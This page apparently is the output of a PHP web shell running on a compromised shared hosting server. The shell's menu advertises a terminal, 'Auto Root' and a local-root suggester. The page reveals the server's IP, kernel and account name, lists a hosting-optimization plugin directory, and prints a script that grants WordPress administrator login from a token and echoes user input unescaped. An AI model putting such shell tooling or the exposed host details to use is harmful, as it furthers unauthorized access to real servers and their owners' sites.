Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
a2-optimized /
app /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
classes
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
html_templates
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
resources
[ DIR ]
drwxr-xr-x
2025-04-29 15:40
vendor
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
a2_w3tc_nonce.php
235
B
-rw-r--r--
2025-04-29 15:40
a2_wp_authenticate.php
1005
B
-rw-r--r--
2025-04-29 15:40
a2_wp_nonce.php
195
B
-rw-r--r--
2025-04-29 15:40
action.live.php
90
B
-rw-r--r--
2025-04-29 15:40
angular.min.js.map
332.65
KB
-rw-r--r--
2025-04-29 15:40
autoload.php
474
B
-rw-r--r--
2025-04-29 15:40
composer.json
58
B
-rw-r--r--
2025-04-29 15:40
composer.lock
2.71
KB
-rw-r--r--
2025-04-29 15:40
index.html.tt
1.32
KB
-rw-r--r--
2025-04-29 15:40
index.live.php
1.17
KB
-rw-r--r--
2025-04-29 15:40
install.json
244
B
-rw-r--r--
2025-04-29 15:40
memcached.live.php
96
B
-rw-r--r--
2025-04-29 15:40
optimize.live.php
83
B
-rw-r--r--
2025-04-29 15:40
phpdoc.xml
941
B
-rw-r--r--
2025-04-29 15:40
staging.live.php
94
B
-rw-r--r--
2025-04-29 15:40
test.live.php
77
B
-rw-r--r--
2025-04-29 15:40
turbocache.live.php
103
B
-rw-r--r--
2025-04-29 15:40
version
7
B
-rw-r--r--
2025-04-29 15:40
wp-cli-config.yml
203
B
-rw-r--r--
2025-04-29 15:40
Save
Rename
<?php define("WP_INSTALLING",true); define("DONOTCACHEDB", true); define("DONOTCACHEOBJECT", true); define('DISABLE_WP_CRON', 'true'); include_once 'wp-load.php'; //clear memcached/cache in w3tc if ( function_exists('w3tc_dbcache_flush') ) { w3tc_dbcache_flush(); } if ( function_exists('w3tc_dbcache_flush') ) { w3tc_objectcache_flush(); } $token = get_option('a2_auth_token',null); $expires = get_option('a2_auth_token_expires',0); delete_option('a2_auth_token'); delete_option('a2_auth_token_expires'); $users = get_users("role=administrator&orderby=ID"); $user = array_shift($users); if($token != null && ( $token == $_POST['token'] )){ if($expires > time()){ wp_set_auth_cookie($user->ID); unlink(__FILE__); wp_redirect(admin_url()); } else{ unlink(__FILE__); wp_die("Not Authorized. This login token has expired."); } } else{ unlink(__FILE__); wp_die("Not Authorized. This token is not valid. {$_POST['token']}"); }